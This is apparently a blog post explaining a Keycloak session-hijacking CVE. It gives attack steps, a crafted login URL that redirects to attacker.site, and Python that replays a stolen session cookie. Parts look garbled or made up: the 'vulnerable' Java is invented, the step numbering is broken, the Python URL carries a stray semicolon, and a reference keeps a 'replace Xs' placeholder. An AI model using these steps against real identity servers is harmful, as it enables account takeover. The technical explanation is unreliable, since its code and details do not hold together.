CVE-2023-6787 - Keycloak Session Hijacking via Re-authentication Flaw

Keycloak is a popular open-source identity and access management tool used by many organizations to secure their web applications. However, in December 2023, a critical vulnerability was discovered: CVE-2023-6787. This flaw affects Keycloak’s re-authentication mechanism, allowing an attacker to hijack a valid user session by exploiting a mishandling of session IDs during interrupted logins.

In this post, we will explain the vulnerability, how it works, show you code snippets, exploit details, and references for further reading.

What Is CVE-2023-6787?

CVE-2023-6787 is a vulnerability in Keycloak’s authentication flow. It happens when the re-authentication mechanism (found in the org.keycloak.authentication package) fails to safely handle a certain sequence of user interactions.

The Root Cause

Keycloak supports the prompt=login query parameter (as per OAuth2/OpenID Connect standards) to force a re-authentication flow. If a user is in an active session and gets forced to re-authenticate, they will see a login screen again. If, at this point, the user clicks "Restart login" (instead of logging in), Keycloak wrongly treats the session as belonging to the previous user but with a new subject (SUB) assigned to the session.

The issue:
Keycloak does not correctly invalidate the old Session Identifier (SID) for the original user session. The new session, even though representing a "different" user, retains the same SID as the original. This allows an attacker to hijack the SID and effectively take over the original user’s session.

Victim logs in normally to a Keycloak-protected app. The session has a SID (say, SID123).

2. Attacker triggers a request to the same Keycloak login endpoint with prompt=login while the victim's session is active (e.g., via phishing or malicious site redirect).

3. The victim is presented with a new login window. Instead of completing authentication, the victim clicks "Restart login" (or closes the window).

Keycloak creates a new session subject for the login but keeps the same SID.

5. The attacker can now use the SID123 to access resources as the victim—session takeover is successful.

Let’s look at a snippet that shows part of the vulnerable flow (abridged for clarity)

// In Keycloak's authentication handler (simplified)
if (request.getParameter("prompt").equals("login")) {
    // Forces fresh authentication, even if there is an active session
    session.logout(); 

    try {
        // User presented with new login, expects new session
        session = sessionManager.createSession();
    } catch (AuthenticationException e) {
        // User cancels or selects "Restart login"
        // Vulnerability: Old SID (session ID) is NOT invalidated!
        // session retains previous SID, but new user subject is assigned
    }
}

In a secure implementation, the session should always be invalidated when the user cancels, and a new SID must be issued.

Encourage a logged-in victim to visit the following URL, which includes the prompt=login parameter

https://YOUR_KEYCLOAK_DOMAIN/auth/realms/master/protocol/openid-connect/auth
?client_id=attack-app
&redirect_uri=https://attacker.site/callback
&response_type=code
&scope=openid
&prompt=login

2. Victim Action

The victim is shown a login screen while already logged in. They click "Restart login" or cancel.

3. Exploit SID

The attacker, monitoring for leaked SIDs (via session cookies or browser storage), now reuses the session. Because SID wasn't invalidated, the attacker now controls the same session as the victim but with a different user subject.

Example in Python (Pseudo-Code)

import requests

session_cookies = {'KEYCLOAK_SESSION': 'SID123'}

# Attacker makes a request as the victim using the stolen SID
resp = requests.get(
    'https://your-keycloak-app/protected/resource';,
    cookies=session_cookies
)
print(resp.text)  # Attacker gets victim's data!

Mitigation

UPGRADING Keycloak to a version where CVE-2023-6787 is patched is critical.

- Ensure that session identifiers are always invalidated upon canceled or interrupted re-authentication.

References (Learn More)

- Red Hat Security Advisory RHSA-2024:1182
- Keycloak Issue Tracker - KEYCLOAK-23368 *(replace Xs with real ID if available)*
- OpenID Connect: prompt=login Documentation
- Keycloak Official Releases

Final Thoughts

CVE-2023-6787 is a strong reminder: session management is hard, even for mature platforms. If you're running Keycloak, update immediately, and review all custom login/re-auth flows for unsafe sid/sub handling.

If you need more details, consult the references above or reach out to the Keycloak user mailing list for help.

Timeline

Published on: 04/25/2024 16:15:10 UTC
Last modified on: 04/25/2024 17:24:59 UTC